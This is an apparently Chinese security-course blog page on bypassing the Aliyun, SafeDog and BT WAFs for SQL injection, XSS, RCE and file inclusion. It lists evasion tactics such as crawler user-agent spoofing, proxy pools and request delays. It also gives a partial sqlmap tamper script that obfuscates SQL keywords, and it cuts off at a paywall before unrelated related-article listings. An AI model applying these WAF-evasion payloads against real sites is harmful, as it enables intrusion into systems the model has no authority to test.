第49天-WAF 绕过-漏洞利用之注入上传跨站等绕过

原创 已于 2022-04-13 10:39:54 修改 · 3.1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-04-13 10:38:49 首次发布
本文详细介绍了如何使用sqlmap工具配合代理、tamper脚本和user-agent修改来绕过阿里云、SafeDog及BTWAF的防护。通过调整注入规则、模拟用户行为以及利用XSStrike进行XSS攻击的绕过。同时,针对RCE漏洞,文章提到了利用可逆编码算法和替换方法绕过防火墙拦截,并探讨了文件包含漏洞的利用策略。

思维导图

在这里插入图片描述

阿里云 + safedog + BT waf

SQL 注入

注入方式

手工注入

简单、不需要考虑CC 防护

工具注入

sqlmap 速度很快,会触发CC防御

safedog CC 绕过

user-agent

–delay

代理池:换ip

CC 拦截绕过

user-agent:伪装成爬虫白名单

代理池:每秒钟换ip

延时设置: --delay

aliyun + safedog 演示

sqlmap工具+代理 +tamper (自写注入规则)

–tamper

rdog.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""


from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload,**kwargs):
    retVal =""
    if payload:
        payload = payload.replace("union","%23a%0aunion")
        payload = payload.replace("select","/*!4457select*/")
        payload = payload.replace("%20","%23a%0a")
        payload = payload.replace(" ","%23a%0a")
        payload = payload.replace(<
最低0.47元/天 解锁文章
C语言连接rocketmq,RocketMq之Producer原理浅析
weixin_30692969的博客
05-19 591
生产者是怎么发消息的?MessageQueue首先在理解生产者发消息之前,必须要明白一个概念:MessageQueue是什么?其实MessageQueue是RocketMq的一种数据分片+物理存储机制。我们一般在创建 Topic 的时候会指定 MessageQueue 的数量。如上图,一个 Topic 中有4个 MessageQueue,每个 Brokers 上有2个 MessageQueue ,...
im即时通讯开发:浅析IM长连接、心跳及重连机制
蔚可云的博客
06-15 589
说道“心跳”这个词大家都不陌生,当然不是指男女之间的心跳,而是长连接相关的。顾名思义就是证明是否还活着的依据。什么场景下需要心跳呢?目前我们接触到的大多是一些基于长连接的应用需要心跳来“保活”。由于在长连接的场景下,客户端服务端并不是一直处于通信状态,如果双方长期没有沟通则双方都不清楚对方目前的状态,所以需要发送一段很小的报文告诉对方“我还活着”。 同时还有另外几个目的:1)服务端检测到某个客户端迟迟没有心跳过来可以主动关闭通道,让它下线;2)客户端检测到某个服务端迟迟没有响应心跳也能重连获取一个新的连
Web 通信 之 长连接、长轮询(long polling)
weixin_34406061的博客
09-26 2289
基于HTTP长连接,是一种通过长轮询方式实现"服务器推"的技术,它弥补了HTTP简单的请求应答模式的不足,极大地增强了程序的实时性交互性。 一、什么是长连接、长轮询? 用通俗易懂的话来说,就是客户端不停的向服务器发送请求以获取最新的数据信息。这里的“不停”其实是有停止的,只是我们人眼无法分辨是否停止,它只是一种快速的停下然后又立即开始连接而已...
转:HTTP长连接短连接原理浅析
08-04 805
1. HTTP协议与TCP/IP协议的关系   HTTP长连接短连接本质上是TCP长连接短连接HTTP属于应用层协议,在传输层使用TCP协议,在网络层使用IP协议。IP协议主要解决网络路由寻址问题,TCP协议主要解决如何在IP层之上可靠的传递数据包,使在网络上的另一端收到发端发出的所有包,并且顺序与发出顺序一致。TCP有可靠,面向连接的特点。   2. 如何理解HTTP协议是无状态的
http 长链接短链接
最新发布
果酱 の 博客
10-13 641
HTTP协议中长链接与短链接的主要区别在于TCP连接的复用策略。短链接每次请求都建立新连接,请求完成立即关闭,适合低频单次请求;长链接复用同一TCP连接处理多个请求,通过keep-alive保持连接,减少握手开销,适用于高频连续请求场景。HTTP/1.1默认启用长链接,而HTTP/2HTTP/3进一步优化了连接复用效率。实际应用中需合理配置连接超时参数,平衡资源占用与性能需求。
http长连接机制
whczx023的博客
10-19 477
Connection: close HTTP heade这句话的含义是表明当前正在使用的tcp链接在当前请求处理完毕后会被断掉。 在http1.0协议中每次请求响应都会创建一个新的tcp连接,http1.1之后才开始支持可以重用第一次请求的http连接, 默认支持长连接形式。 如果client或server端不想支持长连接,则需要在http的header加上connect...
HTTP 长连接短连接
yltrcc的博客
12-20 614
Never give up until the fight is over. 永远不要放弃,要一直战斗到最后一秒。
Python实现长链接转短链接(附实现原理
憧憬001-的博客
04-10 4046
话不多说,直接上代码 # 导入requests库 import requests # 需要转换的长链接 long_url = "https://github.com/chongjing001/MyProject/tree/master/renting" querystring = {"url":long_url} # 调用接口实现(感谢大神的接口) url = "http://suo.im/a...
asp.net 数据库连接池浅析
10-29
***数据库连接池浅析 ***技术默认支持数据库连接池,这一特性使得应用程序可以复用数据库连接而无需频繁地建立新的连接,从而大幅提升了应用程序性能可扩展性。连接池的工作原理是通过维护一个连接池来管理数据库...
数据库连接池浅析Java开发Java经验技巧共5页.pdf
11-22
5. 监控管理:连接池会定期检查池中的连接状态,对于长时间未使用的连接可能会进行回收,以防止资源浪费。 Java开发中,配置使用数据库连接池通常涉及以下几点: - 配置文件:开发者需要在配置文件(如...
浅析DX发射机触摸屏与SLC 500 PLC连接方式及通信原理.pdf
08-08
#资源达人分享计划#
http长连接原理
坚定目标,超越自我
08-30 1214
HTTP长连接通过复用TCP连接来提高通信效率,减少延迟服务器负载。它是现代Web通信的重要组成部分,为高效的HTTP通信奠定了基础。随着HTTP/2HTTP/3的出现,连接管理变得更加高效,但长连接的基本原理仍然适用。在实际应用中,需要根据具体场景合理配置管理长连接,以获得最佳性能。
你了解HTTP长连接吗?
Always-Learning
09-27 501
长连接出现的前夜 在了解长连接之前,我们先看看与之对应的短连接是什么?在HTTP协议的初始版本中,每进行一次HTTP通信就要断开一次TCP连接。 早前的通信情况来看,因为都是些容量很小的文本传输,所以没有太大的问题,但是随着HTTP传输文档中包含大量的富文本,比如使用浏览器浏览一个包含多张图片的HTML页面的时候,在发送请求访问HTML页面资源的同时,也会请求该HTML页面包含的其他资源,因此,每次的请求都会造成无谓的TCP连接的建立断开,增大了开销。 keep-alive字段 为了解决上面的问
HTTP长连接实现原理
hulianwangjike的博客
08-15 1834
持续每天分享好用的软件源码
TCP 的长连接与短链接
qq_39820671的博客
09-14 2318
1. HTTP协议与TCP/IP协议的关系 HTTP长连接短连接本质上是TCP长连接短连接HTTP属于应用层协议,在传输层使用TCP协议,在网络层使用IP协议。 IP协议主要解决网络路由寻址问题,TCP协议主要解决如何在IP层之上可靠地传递数据包,使得网络上接收端收到发送端所发出的所有包,并且顺序与发送顺序一致。TCP协议是可靠的、面向连接的。 2. 如何理解HTTP协议是无状态的 HTTP协议是无状态的,指的是协议对于事务处理没有记忆能力,服务器不知道客户端是什么状态。也就是说,打开一个.
http中的长连接短连接你真的了解吗?
weixin_45701550的博客
03-16 5143
做web开发的老铁应该都知道http协议,它是前后端通信中非常常用的一种通信协议,HTTP(HyperText Transfer Protocol)即超文本传输协议,是互联网上应用最为广泛的一种网络协议。HTTP协议是一个基于请求-响应模型的协议,客户端(浏览器、移动客户端等)发起请求,服务端接收请求后进行处理并返回响应。在HTTP协议中,有两种连接方式:长连接短连接,它们主要区别在于连接的持续时间资源利用率。
HTTP长连接(持久连接)短连接
03-23 1577
HTTP长连接(持久连接)短连接 HTTP长连接短连接 本文总结&分享网络编程中涉及的长连接短连接概念。 关键字:Keep-Alive,并发连接数限制,TCP,HTTP 一、...
一文搞懂 HTTP长连接短连接
Java搜索工程技术栈
06-20 9494
HTTP长连接短连接本质上是 TCP 长连接短连接HTTP 属于应用层协议,在传输层使用 TCP 协议,在网络层使用 IP 协议。IP 协议主要解决网络路由寻址问题,TCP 协议主要解决如何在 IP 层之上可靠的传递数据包,使在网络上的另一端收到发端发出的所有包,并且顺序与发出顺序一致。TCP 有可靠,面向连接的特点。HTTP 协议是无状态的,指的是协议对于事务处理没有记忆能力,服务器不知道客户端是什么状态。也就是说,打开一个服务器上的网页你之前打开这个服务器上的网页之间没有任何联系。HTTP
Java数据库连接池DBCP原理与实现浅析
资源摘要信息:"Java数据库连接池之DBCP浅析_动力节点Java学院整理"一文深入探讨了在Java应用开发中如何通过使用DBCP(Database Connection Pool)实现高效、稳定的数据库连接管理机制。文章从实际应用场景出发,指出...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值